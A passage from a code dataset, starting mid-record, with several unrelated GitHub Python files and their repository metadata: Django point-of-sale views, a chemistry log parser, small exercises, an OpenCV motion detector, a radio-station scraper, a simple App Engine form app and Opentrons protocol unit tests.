'POST':\n category_form = AddCategoryForm(request.POST)\n if category_form.is_valid():\n category_form.save()\n name = category_form.cleaned_data.get('name')\n messages.success(request, f'{name} Category Added Successfully')\n return redirect('pointofsale-inventory')\n else:\n category_form = AddCategoryForm()\n return render(request, 'pointofsale/inventory.html', {'category_form': category_form})\n\ndef add_product(request):\n try:\n if request.method == 'POST':\n product_form = AddProductForm(request.POST)\n if product_form.is_valid():\n Product = product_form.save(commit=False)\n Product.staff = request.user\n image = request.FILES['image_field']\n file_save = FileSystemStorage()\n file_save.save(image.name, image)\n Product.image_field = image\n Product = Product.save()\n name = product_form.cleaned_data.get('name')\n messages.success(request, f'{name} Product Added Successfully')\n return redirect('pointofsale-inventory')\n else:\n product_form = AddProductForm()\n return render(request, 'pointofsale/inventory.html', {'product_form': product_form})\n except:\n messages.warning(request, f'Add image before upload')\n return render(request, 'pointofsale/inventory.html')\n\ndef update_product(request):\n update_form = UpdateProductForm(request.POST)\n if request.method =='POST':\n product_id = request.POST['product_id']\n name = request.POST['name']\n desc = request.POST['desc']\n cost_price = request.POST['cost_price']\n selling_price = request.POST['selling_price']\n discount_price = request.POST['discount_price']\n category = update_form.data['category']\n Product.objects.filter(pk=int(product_id)).update(id=int(product_id), name=name, description=desc, cost_price=cost_price,\n selling_price=selling_price,discount_price=discount_price, category_id=int(category))\n \n messages.success(request, f'Product Updated Successfully')\n return redirect('pointofsale-inventory')\n \ndef stock_product(request):\n if request.method =='POST':\n product_id = request.POST['product_id']\n quantity = request.POST['quantity']\n cost_price = request.POST['cost_price']\n total_cost_price = int(cost_price) * int(quantity)\n Product.objects.filter(pk=int(product_id)).update(quantity=quantity, total_cost_price=total_cost_price)\n \n messages.success(request, f'Product Stocked Successfully')\n return redirect('pointofsale-inventory')\n\ndef delete_product(request):\n if 
request.method =='POST':\n product_id = request.POST['product_id']\n Product.objects.filter(pk=int(product_id)).delete()\n \n messages.success(request, f'Product Deleted Successfully')\n return redirect('pointofsale-inventory')\n\n\nclass SalesView(ListView):\n model = Product\n template_name = \"pointofsale/sales.html\"\n context_object_name = \"products\"\n paginate_by = 8\n ordering = ['name']\n\ndef search(request):\n if request.method == 'POST':\n search = request.POST['search']\n search = search.lower()\n if search:\n match = Product.objects.filter(name__icontains=search)\n\n if match:\n return render(request, 'pointofsale/sales.html', {'products': match})\n else:\n messages.error(request, \"No Product Found\")\n return render(request, 'pointofsale/sales.html')\n \n \nclass ProductDetailView(DetailView):\n model = Product\n template_name = \"pointofsale/product-page.html\"\n\n@login_required\ndef add_to_cart(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_item, created = PurchaseItem.objects.get_or_create(product=product, user=request.user, purchased=False)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item.quantity +=1\n purchase_item.save()\n messages.info(request, \"This product quantity has been updated in the receipt\")\n else:\n purchase.product.add(purchase_item)\n messages.info(request, \"This product has been added to the receipt\")\n\n else:\n ordered_date = timezone.now()\n purchase = Purchase.objects.create(user=request.user, ordered_date=ordered_date)\n purchase.product.add(purchase_item)\n return redirect(\"pointofsale-sales\")\n\n@login_required\ndef add_to_cart_quantity(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_item, created = PurchaseItem.objects.get_or_create(product=product, user=request.user, purchased=False)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item.quantity +=1\n purchase_item.save()\n messages.info(request, \"This product quantity has been updated in the receipt\")\n else:\n purchase.product.add(purchase_item)\n messages.info(request, \"This product has been added to the receipt\")\n\n else:\n ordered_date = timezone.now()\n purchase = Purchase.objects.create(user=request.user, ordered_date=ordered_date)\n purchase.product.add(purchase_item)\n return redirect(\"order-summary\")\n\ndef remove_from_cart(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_qs = Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n # check if the order item is in the order\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item = PurchaseItem.objects.filter(product=product, user=request.user, purchased=False)[0]\n purchase.product.remove(purchase_item)\n purchase_item.delete()\n messages.info(request, \"This item was removed from your cart.\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"This item was not in your cart\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"You do not have an active order\")\n return redirect(\"order-summary\")\n\n\ndef remove_single_item_from_cart(request, pk):\n product = get_object_or_404(Product, pk=pk)\n purchase_qs = 
Purchase.objects.filter(user=request.user, purchased=False)\n if purchase_qs.exists():\n purchase = purchase_qs[0]\n # check if the order item is in the order\n if purchase.product.filter(product__id=product.id).exists():\n purchase_item = PurchaseItem.objects.filter(product=product, user=request.user, purchased=False)[0]\n if purchase_item.quantity > 1:\n purchase_item.quantity -= 1\n purchase_item.save()\n else:\n purchase.product.remove(purchase_item)\n messages.info(request, \"This item quantity was updated.\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"This item was not in your cart\")\n return redirect(\"order-summary\")\n else:\n messages.info(request, \"You do not have an active order\")\n return redirect(\"order-summary\")\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n def get(self, *args, **kwargs):\n try:\n purchase = Purchase.objects.get(user=self.request.user, purchased=False)\n context = {\n 'object': purchase\n }\n return render(self.request, 'pointofsale/receipt.html', context)\n except ObjectDoesNotExist:\n messages.error(self.request, \"You do not have any order\")\n return redirect('pointofsale-sales')\n \n\n\ndef receive_payment(request):\n if request.method == 'POST':\n purchase = Purchase.objects.get(user=request.user, purchased=False)\n purchase_item = purchase.product.all()\n purchase_item.update(purchased=True)\n for item in purchase_item:\n Product.objects.filter(pk=int(item.product.id)).update(quantity=(item.product.quantity - item.quantity))\n item.save()\n purchase.total_amount = purchase.get_total() \n purchase.purchased = True\n purchase.save()\n messages.success(request, \"Payment received successfully\")\n return redirect('pointofsale-sales')\n\n\n","repo_name":"chidibede/django_pos_app","sub_path":"pointofsale_project/pointofsale/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19361588236","text":"import os\nimport copy\nimport glob\nfrom .tools_unit_constant import unit_ang2au, unit_au2ang\nfrom .parser_grrm_param import parser_grrm_param\n\ndef parser_grrm_dat(fname):\n\n tmp_fn_list=glob.glob(\"%s_P*.dat\" % (fname))\n tmp_fn_list.sort()\n\n ## ---------------\n ## get list dat\n ## ---------------\n out_list=[]\n count_id=0\n for ifn in range(0, len(tmp_fn_list)):\n t_num=tmp_fn_list[ifn][len(fname)+2:-4]\n if t_num.isnumeric():\n tmp_dat,count_id\\\n =_load_dat_file(tmp_fn_list[ifn], count_id)\n\n for idat in range(0,len(tmp_dat)):\n out_list.append(copy.deepcopy(tmp_dat[idat]))\n \n del tmp_dat\n\n if len(out_list) > 0:\n return out_list\n\n \n ## -------------------------\n ## Find infile jobs\n ## -------------------------\n fn_param_rrm=\"%s_PARAM.rrm\" % (fname)\n param_infile=\"none\"\n param_jobtype=\"none\"\n if os.path.exists(fn_param_rrm):\n ## get the infile information\n param_dat=parser_grrm_param(fn_param_rrm)\n param_jobtype=param_dat[\"jobtype\"]\n param_infile=param_dat[\"infile\"]\n if param_jobtype==\"repath\" and param_infile!=\"none\":\n\n dn_infile=fname[:-(len(fname.split(\"/\")[-1])+1)]\n\n fn_abs_infile_top=\"%s/%s\" % (dn_infile, param_infile)\n\n ## Load pt path from the previous job\n out_list=parser_grrm_dat(fn_abs_infile_top)\n \n \n return out_list\n\n \ndef _load_dat_file(fn_abs_dat, count_id):\n\n ls_dat=[]\n\n fdat = open(fn_abs_dat, 'r')\n ieq_cout=-1\n tag_first_eq=0\n line = True\n while line:\n\n line = fdat.readline()\n \n #RESULTS\n 
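# (This commented block is a sample record from a GRRM *.dat file; the parser below walks its markers in order: CURRENT COORDINATE, ENERGY, S**2, GRADIENT, DIPOLE.)\n            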
#CURRENT COORDINATE\n #H -1.696741879408 -0.381991249860 -0.776848274818\n #B 0.778532341016 -0.368262935046 -0.940077243633\n #C -0.644739894670 -0.303723056303 -0.550973655507\n #P 0.316401529176 0.133374525555 0.871271043561\n #ENERGY = -404.733252292855 0.000000000000 0.000000000000\n # = 0.000000000000 0.000000000000 0.000000000000\n #S**2 = 0.756508849780\n #GRADIENT\n # 0.003235547110\n # 0.000410425111\n # -0.001175093180\n # 0.015696975400\n # -0.006641569140\n # -0.026453248300\n # -0.026122430400\n # -0.006014107450\n # -0.013792948200\n # 0.007189907880\n # 0.012245251500\n # 0.041421289600\n #DIPOLE = -0.422221604000 0.027694074600 0.118443339000\n\n if \"CURRENT COORDINATE\" in line:\n ## put the last dat into json:\n t_json={}\n t_xyz=[]\n while line:\n line = fdat.readline()\n \n if \"ENERGY\" in line:\n break\n else:\n t_d=line.split()\n t_w=[]\n t_w.append(float(t_d[1])*unit_ang2au())\n t_w.append(float(t_d[2])*unit_ang2au())\n t_w.append(float(t_d[3])*unit_ang2au())\n t_xyz.append(t_w)\n\n ## Load Energy\n t_ene=[]\n t_ene.append(float(line.split()[2]))\n t_ene.append(float(line.split()[3]))\n t_ene.append(float(line.split()[4]))\n line = fdat.readline()\n t_ene.append(float(line.split()[1]))\n t_ene.append(float(line.split()[2]))\n \n ## Load S^2 value\n line = fdat.readline() #S**2 = 0.756508849780\n t_s2v=float(line.split()[2])\n \n ## Load Gradient\n natoms=len(t_xyz)\n line = fdat.readline() #GRADIENT\n t_grad=[]\n for iatom in range(0, natoms):\n work=[]\n for idim in range(0,3):\n line = fdat.readline()\n work.append(float(line))\n t_grad.append(work)\n\n ## Load DIPOLE\n line = fdat.readline() #DIPOLE = -0.422221604000 0.027694074600 0.118443339000\n t_dipol=[]\n t_dipol.append(float(line.split()[2]))\n t_dipol.append(float(line.split()[3]))\n t_dipol.append(float(line.split()[4]))\n \n ## save into the lib\n t_json[\"category\"]=\"DAT\"\n t_json[\"symmetry\"]=\"\"\n t_json[\"num\"]=count_id\n t_json[\"xyz\"]=copy.deepcopy(t_xyz)\n t_json[\"energy\"]=copy.deepcopy(t_ene)\n t_json[\"gradient\"]=copy.deepcopy(t_grad)\n t_json[\"s2_value\"]=t_s2v\n t_json[\"dipole\"]=copy.deepcopy(t_dipol)\n t_json[\"atomname\"]=[]\n t_json[\"hess_eigenvalue_au\"]=[]\n ieq_cout=ieq_cout+1\n t_json[\"comment\"]=\"NODE%d\" % (ieq_cout)\n\n ## add to list and count up\n count_id=count_id+1\n ls_dat.append(t_json)\n fdat.close() \n\n return ls_dat, count_id\n\n","repo_name":"scan-team/grrmlog_parser","sub_path":"grrmlog_parser/parser_grrm_dat.py","file_name":"parser_grrm_dat.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13015679360","text":"#Group Members\n#1.Troy Liam Jarata\n#2.Marc Janel Quita\n#Joanna Marie Biason\n#October 13,2018\n#1BSIT-01\n#Display the message in one line\n#We display this message in one line\ncontainer = []\nprint(\"Input Number\")\nfor x in range(10):\n lagay=int(input(\"\"))\n container.append(lagay)\na=container.count(max(container))\nprint(\"Occurence of the biggest number: \",a)\nb=str(a)\nc=str(container)\nd=max(container)\ne=str(d)\nf=open(\"MP 34.txt\",'w')\nf.write(\"==================================================================\\n\")\nf.write(\"NUMBERS INPUTED: \\n\")\nfor future in range(len(container)):\n f.write(str(container[future]))\n f.write(\"\\n\")\nf.write((\"Occurence of the biggest number: \"))\nf.write(str(b))\nf.write(\"\\n==================================================================\")\nf=open(\"MP 
34.txt\",'r')\nf.close\nprint(\"Successfully Done\")\n","repo_name":"Riuseigi/MP-Finals","sub_path":"MP 34x.py","file_name":"MP 34x.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19925398877","text":"'''\n\n给定一个仅包含数字 2-9 的字符串,返回所有它能表示的字母组合。\n\n给出数字到字母的映射如下(与电话按键相同)。注意 1 不对应任何字母。\n\n\n\n示例:\n\n输入:\"23\"\n输出:[\"ad\", \"ae\", \"af\", \"bd\", \"be\", \"bf\", \"cd\", \"ce\", \"cf\"].\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/letter-combinations-of-a-phone-number\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n\n dic = {'1':'!@#','2':'abc','3':'def','4':'ghi','5':'jkl','6':'mno','7':'pqrs','8':'tuv','9':'wxyz'}\n\n if len(digits) == 0:\n return []\n\n oris = []\n\n for s in digits:\n oris.append(dic[s])\n\n res = [s0 for s0 in oris[0]]\n for i in range(1, len(digits)):\n res = [s0+s1 for s0 in res for s1 in oris[i]]\n\n return res\n\n'''\n\ndigits = '234'\n\ndic = {'1':'!@#','2':'abc','3':'def','4':'ghi','5':'jkl','6':'mno','7':'pqrs','8':'tuv','9':'wxyz'}\n\nif len(digits) == 0:\n print('')\n\noris = []\n\nfor s in digits:\n oris.append(dic[s])\n\nres = [s0 for s0 in oris[0]]\nfor i in range(1, len(digits)):\n res = [s0+s1 for s0 in res for s1 in oris[i]]\n\n\n\n# res = []\n#\n# for s in oris[0]:\n# res.append(s)\n#\n# for s0 in res:\n# for s1 in\n#\n# for i in range(len(oris)-1):\n# for s0 in oris[i]:\n# for s1 in oris[i+1]:\n# res.append(s0+s1)\n#\n","repo_name":"zampie/learning","sub_path":"leetcode/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5870875176","text":"import random\nimport tqdm\nimport os\n\ndef outfile(file,outstring):\n with open(file, 'a+') as f:\n f.write(outstring + \"\\n\")\ndef delfile(file):\n if os.path.exists(file):\n os.remove(file)\n\ndelfile(\"data/ml1m/nfm_valid_1m_ratings.dat\")\ndelfile(\"data/ml1m/nfm_test_1m_ratings.dat\")\nwith open(\"data/ml1m/test_1m_ratings.dat\",\"r\") as fin:\n for line in tqdm.tqdm(fin):\n line = line.strip()\n i = random.randint(1,2)\n if i == 1:\n outfile(\"data/ml1m/nfm_valid_1m_ratings.dat\", line)\n else:\n outfile(\"data/ml1m/nfm_test_1m_ratings.dat\", line)\n #pass","repo_name":"wangzhen21/DeepRec","sub_path":"split_to_valid_test.py","file_name":"split_to_valid_test.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33439999137","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport argparse\nimport time\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-c', '--color', type=str, default='gray',\n help='Color space: \"gray\" (default), \"rgb\"')\nparser.add_argument('-b', '--bins', type=int, default=256,\n help='Number of bins per channel (default 256)')\nparser.add_argument('-s', '--sim', type=float, default=0.995,\n help='Similarity of histograms (default 0.995)')\nargs = vars(parser.parse_args())\n\ncolor = args['color']\nbins = args['bins']\nsim = args['sim']\n\nfig, ax = plt.subplots()\nif color == 'rgb':\n ax.set_title('Histograma RGB')\nelse:\n ax.set_title('Histograma escala de cinza')\nax.set_xlabel('Bins')\nax.set_ylabel('Frequency (N of Pixels)')\n\nlw = 3\nalpha = 0.5\nif color == 'rgb':\n lineR, = ax.plot(np.arange(bins), 
np.zeros((bins,)), c='r', lw=lw, alpha=alpha, label='Red')\n lineG, = ax.plot(np.arange(bins), np.zeros((bins,)), c='g', lw=lw, alpha=alpha, label='Green')\n lineB, = ax.plot(np.arange(bins), np.zeros((bins,)), c='b', lw=lw, alpha=alpha, label='Blue')\n\n canal_referenceR = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceR = cv2.calcHist([canal_referenceR], [0], None, [bins], [0, 255])\n\n canal_referenceG = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceG = cv2.calcHist([canal_referenceG], [0], None, [bins], [0, 255])\n\n canal_referenceB = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceB = cv2.calcHist([canal_referenceB], [0], None, [bins], [0, 255])\n\nelse:\n lineGray, = ax.plot(np.arange(bins), np.zeros((bins,1)), c='k', lw=lw, label='intensity')\n\n image_referenceGRAY = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceGRAY = cv2.calcHist([image_referenceGRAY], [0], None, [bins], [0, 255])\n\nax.set_xlim(0, bins)\nax.set_ylim(0, bins + 50)\nax.legend()\nplt.ion()\nplt.show()\n\ncapture = cv2.VideoCapture(0)\nwhile True:\n existe_frame, frame = capture.read()\n frame = cv2.flip(frame, 0)\n\n if not existe_frame:\n break\n\n if color == 'rgb':\n cv2.imshow('RGB', frame)\n (b, g, r) = cv2.split(frame)\n histogramR = cv2.calcHist([r], [0], None, [bins], [0, 255])\n histogramG = cv2.calcHist([g], [0], None, [bins], [0, 255])\n histogramB = cv2.calcHist([b], [0], None, [bins], [0, 255])\n\n cv2.normalize(histogramR, histogramR, 0, 255, cv2.NORM_MINMAX)\n cv2.normalize(histogramG, histogramG, 0, 255, cv2.NORM_MINMAX)\n cv2.normalize(histogramB, histogramB, 0, 255, cv2.NORM_MINMAX)\n\n lineR.set_ydata(histogramR)\n lineG.set_ydata(histogramG)\n lineB.set_ydata(histogramB)\n\n similarityR = cv2.compareHist(histogram_referenceR, histogramR, cv2.HISTCMP_CORREL)\n similarityG = cv2.compareHist(histogram_referenceG, histogramG, cv2.HISTCMP_CORREL)\n similarityB = cv2.compareHist(histogram_referenceB, histogramB, cv2.HISTCMP_CORREL)\n\n similarity = (similarityR + similarityG + similarityB) / 3\n print(similarity)\n\n if (similarityR < sim) or (similarityG < sim) or (similarityB < sim):\n print(\"[INFO] ALARME: movimento detectado \" + datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n histogram_referenceR = histogramR.copy()\n histogram_referenceG = histogramG.copy()\n histogram_referenceB = histogramB.copy()\n\n else:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Grayscale', gray)\n histogramGRAY = cv2.calcHist([gray], [0], None, [bins], [0, 255])\n\n cv2.normalize(histogramGRAY, histogramGRAY, 0, 255, cv2.NORM_MINMAX)\n\n lineGray.set_ydata(histogramGRAY)\n\n similarityGRAY = cv2.compareHist(histogram_referenceGRAY, histogramGRAY, cv2.HISTCMP_CORREL)\n\n print(similarityGRAY)\n\n if similarityGRAY < sim:\n print(\"[INFO] ALARME: movimento detectado \" + datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n histogram_referenceGRAY = histogramGRAY.copy()\n\n fig.canvas.draw()\n fig.canvas.flush_events()\n time.sleep(0.1)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncapture.release()\ncv2.destroyAllWindows()\n","repo_name":"matiasucker/image-processing","sub_path":"histogramas/motion_detector.py","file_name":"motion_detector.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26871718625","text":"from typing import List, Dict\n\nclass Scanner(object):\n\tdef __init__(self, depth: int, width: int, pos: int = 0, dir = 1) -> 
None:\n\t\tself.depth = depth\n\t\tself.width = width\n\t\tself.pos = pos\n\t\tself.dir = 1\n\n\tdef update(self):\n\t\tpos = (self.pos + 1) % self.width\n\t\treturn Scanner(self.depth, self.width, pos)\n\n\tdef __repr__(self) -> str:\n\t\tblocks = ['[ ]'] * self.width\n\t\tblocks[self.pos] = '[S]'\n\t\tblocks = ' '.join(blocks)\n\t\treturn blocks\n\ndef update(scanner: Scanner) -> Scanner:\n\tscanner.pos += scanner.dir\n\tif scanner.pos == scanner.width or scanner.pos == -1:\n\t\tscanner.dir *= -1\n\t\tscanner.pos += scanner.dir\n\treturn Scanner(scanner.depth, scanner.width, scanner.pos, scanner.dir)\n\ndef parse_scanners(string: str) -> Dict[int, Scanner]:\n\tscanners: Dict[int, Scanner] = {}\n\tfor line in string.split('\\n'):\n\t\tdepth, width = line.split(': ')\n\t\tdepth, width = int(depth), int(width)\n\t\tscanners[depth] = Scanner(depth, width)\n\treturn scanners\n\ndef update_scanners(scanners: Dict[int, Scanner]) -> Dict[int, Scanner]:\n\treturn {layer : update(scanners[layer]) for layer in scanners}\n\ndef severity(scanners: Dict[int, Scanner]) -> int:\n\tnum_layers = max(scanners)\n\ttotal_severity = 0\n\tfor i in range(num_layers):\n\t\tprint(scanners)\n\t\tif i in scanners:\n\t\t\tif scanners[i].pos == 0:\n\t\t\t\tprint('found!')\n\t\t\t\ttotal_severity += i * scanners[i].width\n\t\t\tprint(i, scanners[i].width, total_severity)\n\t\tscanners = update_scanners(scanners)\n\treturn total_severity\n\ndef rep_scanners(scanners: List[Scanner]) -> str:\n\treprs = [scanner.__repr__() for scanner in scanners]\n\treturn '\\n'.join(reprs)\n\n\n\n\nTEST_INPUT = \"\"\"0: 3\n1: 2\n4: 4\n6: 4\"\"\"\n\ntest_scanners = parse_scanners(TEST_INPUT)\nprint(severity(test_scanners))\n# print(test_scanners)\n# print(update_scanners(test_scanners))\n# print(rep_scanners(test_scanners))\n# print()\n\n# for i in range(5):\n# \ttest_scanners = update_scanners(test_scanners)\n# \tprint(rep_scanners(test_scanners))\n# \tprint()\n","repo_name":"seeM/advent-of-code-2017","sub_path":"day13/firewall.py","file_name":"firewall.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39775947307","text":"# --------------------------------------------------------------------\n\nfrom cgi import escape\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\n# --------------------------------------------------------------------\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n # Write the submission form\n out = self.response.out\n out.write('')\n out.write('
<html><body>\\n')\n        out.write(\"\"\"\n<h1>KAIST CS101</h1>\n<form action=\"/result\" method=\"post\">\n<p>What is your name? <input type=\"text\" name=\"name\"/></p>\n<p>What is your favorite number? <input type=\"text\" name=\"number\"/></p>\n<p><input type=\"submit\" value=\"Submit\"/></p>\n</form>\n\"\"\")\n \nclass Result(webapp.RequestHandler):\n    def post(self):\n        out = self.response.out\n        name = self.request.get('name')\n        nums = self.request.get('number')\n        num = int(nums)\n        sqnum = num ** 2\n        out.write('<html><body>')\n        out.write('<p>Hello %s,</p>' % name)\n        out.write(\"<p>Your lucky square is %d.</p>
\" % sqnum)\n out.write('\\n')\n \n# --------------------------------------------------------------------\n\napplication = webapp.WSGIApplication([('/', MainPage),\n ('/result', Result)],\n debug=True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n\n# --------------------------------------------------------------------\n","repo_name":"otfried/cs101","sub_path":"code/kaist-cs101/cs101.py","file_name":"cs101.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"39446368332","text":"'''\nCreated on 16 2010\n\n@author: ivan\n'''\nimport urllib2\nimport logging\nsite = \"http://myradio.ua/\"\n\n\ndef load_urls_name_page():\n connect = urllib2.urlopen(site)\n data = connect.read() \n result = {} \n file = open(\"MYRADIO_UA.fpl\", \"w\")\n for line in data.split(\"\\n\"):\n line = line.decode(\"cp1251\")\n pre = \"\", start + 10)\n if start > 0 and end > 0: \n url = line[line.find(\"\", start)].replace('\"', '')\n name = line[line.find(\">\", start) + 1:line.find(\"\")]\n result[url.strip()] = name\n \n \n urls = get_radio_ulr(url.strip()).split(\",\")\n line = name.strip() + \" = \" + urls[1] + \", \" + urls[0]\n file.write(line + \"\\n\");\n logging.info(line)\n \n if url.strip() == \"chanel/eurovision\":\n file.close()\n return result\n \n\ndef get_radio_ulr(chanel):\n connect = urllib2.urlopen(site + chanel)\n data = connect.read()\n result = \"\" \n for line in data.rsplit(\"\\n\"):\n \"\"\"\"\"\"\n if line.find(' 0 and line.find('.m3u') and line.find(\"window\") < 0 :\n pre = '
= 2010 and self.arr[0] <= 2020 and self.arr[1] >= 6000 and self.arr[1] <= 17000:\n insurance = self.arr[1] * 5/100\n else:\n insurance = self.arr[1] * 7/100\n\n print(\"The insurance is %s\" %insurance)\n return insurance\n\n\n def car_data(self):\n print(\"The car model is %s, the year is %s, the price is %s\" %(self.arr[2], self.arr[0], self.arr[1]))\n\n\n def door_status(self):\n if self.arr[3] == True:\n print(\"The doors are closed\")\n else:\n print(\"The doors are not closed\")\n\n\n\nford_focus = Car([2005, 2000, \"ford_focus\", True])\naudi_a3 = Car([2011, 15000, \"audi_a3\", False ])\n\nford_focus.car_data()\nford_focus.insurance_price()\nford_focus.door_status()\nprint(\"\\n\")\naudi_a3.car_data()\naudi_a3.insurance_price()\naudi_a3.door_status()","repo_name":"Raycho01/Basic-Python-Programs","sub_path":"project_8.py","file_name":"project_8.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41931336531","text":"import unittest\nfrom opentrons_sdk.protocol import Protocol\n\n\nclass ProtocolTest(unittest.TestCase):\n\n def setUp(self):\n self.protocol = Protocol()\n\n @property\n def instructions(self):\n return self.protocol._commands\n\n def test_normalize_address(self):\n self.protocol.add_container('A1', 'microplate.96', label=\"Output\")\n label = self.protocol._normalize_address('Output:A1')\n self.assertEqual(label, ('output', (0, 0)))\n slot = self.protocol._normalize_address('A1:A1')\n self.assertEqual(slot, ((0, 0), (0, 0)))\n\n def test_transfer(self):\n \"\"\" Basic transfer. \"\"\"\n self.protocol.add_container('A1', 'microplate.96')\n self.protocol.add_container('B1', 'microplate.96')\n self.protocol.add_instrument('A', 'p200')\n self.protocol.add_instrument('B', 'p20')\n self.protocol.transfer('A1:A1', 'B1:B1', ul=100, tool='p20')\n expected = [{\n 'transfer': {\n 'tool': 'p20',\n 'volume': 100,\n 'start': ((0, 0), (0, 0)),\n 'end': ((1, 0), (1, 0)),\n 'blowout': True,\n 'touchtip': True\n }\n }]\n self.assertEqual(self.instructions, expected)\n\n def test_transfer_group(self):\n \"\"\" Transfer group. 
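Each positional argument is a (start, end[, options]) tuple; unset options fall back to the ul/tool keyword defaults passed alongside. 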
\"\"\"\n expected = [{\n 'transfer_group': {\n 'tool': 'p10',\n 'transfers': [\n {\n 'volume': 15,\n 'start': ((0, 0), (0, 0)), # A1:A1\n 'end': ((1, 0), (1, 0)), # B1:B1\n 'blowout': True,\n 'touchtip': True\n },\n {\n 'volume': 1000,\n 'start': ((0, 1), (0, 1)), # A2:A2\n 'end': ((1, 1), (1, 1)), # B2:B2\n 'blowout': True,\n 'touchtip': True\n },\n {\n 'volume': 12,\n 'start': ((0, 2), (0, 2)), # A3:A3\n 'end': ((1, 2), (1, 2)), # B3:B3\n 'blowout': False,\n 'touchtip': True\n },\n {\n 'volume': 12,\n 'start': ((0, 3), (0, 3)), # A4:A4\n 'end': ((1, 3), (1, 3)), # B4:B4\n 'blowout': True,\n 'touchtip': True\n },\n {\n 'volume': 12,\n 'start': ('label', (0, 4)), # label:A5\n 'end': ((1, 4), (2, 0)), # B5:C1\n 'blowout': True,\n 'touchtip': True\n }\n ]\n }\n }]\n self.protocol.add_container('A1', 'microplate.96', label=\"Label\")\n self.protocol.transfer_group(\n ('A1:A1', 'B1:B1', {'ul': 15}),\n ('A2:A2', 'B2:B2', {'ml': 1}),\n ('A3:A3', 'B3:B3', {'blowout': False}),\n ('A4:A4', 'B4:B4'),\n ('Label:A5', 'B5:C1'),\n ul=12,\n tool='p10'\n )\n self.assertEqual(self.instructions, expected)\n\n def test_distribute(self):\n self.protocol.distribute(\n 'A1:A1',\n ('B1:B1', 50),\n ('C1:C1', 5),\n ('D1:D1', 10)\n )\n expected = [{\n 'distribute': {\n 'tool': 'p10',\n 'blowout': True,\n 'start': ((0, 0), (0, 0)),\n 'transfers': [\n {\n 'volume': 50,\n 'end': ((1, 0), (1, 0)), # B1:B1\n },\n {\n 'volume': 5,\n 'end': ((2, 0), (2, 0)), # C1:C1\n },\n {\n 'volume': 10,\n 'end': ((3, 0), (3, 0)) # D1:D1\n }\n ]\n }\n }]\n self.assertEqual(self.instructions, expected)\n\n def test_consolidate(self):\n \"\"\" Consolidate. \"\"\"\n self.protocol.consolidate(\n 'A1:A1',\n ('B1:B1', 50),\n ('C1:C1', 5),\n ('D1:D1', 10)\n )\n expected = [{\n 'consolidate': {\n 'tool': 'p10',\n 'blowout': True,\n 'end': ((0, 0), (0, 0)),\n 'transfers': [\n {\n 'volume': 50,\n 'start': ((1, 0), (1, 0)), # B1:B1\n },\n {\n 'volume': 5,\n 'start': ((2, 0), (2, 0)), # C1:C1\n },\n {\n 'volume': 10,\n 'start': ((3, 0), (3, 0)) # D1:D1\n }\n ]\n }\n }]\n self.assertEqual(self.instructions, expected)\n\n def test_mix(self):\n \"\"\" Mix. \"\"\"\n self.protocol.mix(\n 'A1:A1',\n volume=50,\n repetitions=10\n )\n expected = [{'mix': {\n 'tool': 'p10',\n 'start': ((0, 0), (0, 0)), # A1:A1\n 'blowout': True,\n 'volume': 50,\n 'reps': 10\n }}]\n self.assertEqual(self.instructions, expected)\n\n def test_protocol_run_twice(self):\n \"\"\" Run a protocol twice without error. 
